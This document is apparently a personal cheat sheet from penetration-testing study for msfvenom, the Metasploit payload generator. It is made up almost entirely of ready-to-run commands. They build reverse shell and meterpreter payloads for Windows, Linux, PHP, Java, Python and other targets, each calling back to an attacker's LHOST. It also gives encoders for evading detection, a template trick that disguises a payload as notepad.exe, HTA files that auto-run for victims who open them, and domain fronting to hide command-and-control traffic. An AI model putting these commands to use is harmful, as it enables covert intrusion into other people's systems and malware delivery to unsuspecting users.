Backlink: reference-notes-readme
Command Example
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.172 LPORT=443 EXITFUNC=thread -f aspx -o iistest.aspx
General Flags
Encoders
-e x86/shikata_ga_nai
-e x64/zutto_dekiru
Templates
Use an exe file saved locally as a template. Output will share thumbnail image, metadata, etc.
-x notepad.exe
Available Payloads
Windows
Payloads
Note: All payloads with x64 are 64-bit, all without are 32-bit
windows/shell_reverse_tcp
windows/x64/shell_reverse_tcp
windows/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https
Formats
Compiled
EXE: -f exe -o test.exe
This is a directly executable binary.
ASP: -f asp -o iistest.asp
Mostly used for IIS Web servers.
ASPX: -f aspx -o iistest.aspx
Also mostly used for IIS Web servers.
HTA: -f hta-psh -o file.hta
Submitting HTA files to an end-user will auto-run if they open it.
DLL: -f dll -o file.dll
Used when implementing DLL injection.
Raw
C#: -f csharp
Used to put in to C# code, usually when building malicious dll or bin in VS, then DotNetToJScript.
PS: -f powershell
Used when placing shellcode directly in .ps1 script, usually with macro runner.
Linux
Payloads
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/meterpreter/reverse_tcp
Formats
ELF: -f elf -o file
Script Language Payloads
Python
msfvenom -p python/meterpreter/reverse_https LHOST=192.168.49.205 LPORT=443 -f raw > met.py
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
Java
Payloads
java/jsp_shell_reverse_tcp
Formats
WAR: -f war > shell.war
JavaScript
Payloads
linux/x86/shell_reverse_tcp
windows/x64/shell_reverse_tcp
Formats
JS_LE: CMD=/bin/bash -f js_le -e generic/none
Command Example
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.205 LPORT=443 CMD=/bin/bash -f js_le -e generic/none
PHP
Payloads
php/shell_reverse_tcp
Formats
PHP: -f raw > shell.php
Domain Fronting
msfvenom -p windows/x64/meterpreter_reverse_https HttpHostHeader=cdn123.offseccdn.com LHOST=good.com LPORT=443 -f exe > https-df.exe
The above probably isn't useful anymore since Azure, the only Cloud provider that supported this type of attack, killed it in March 2021.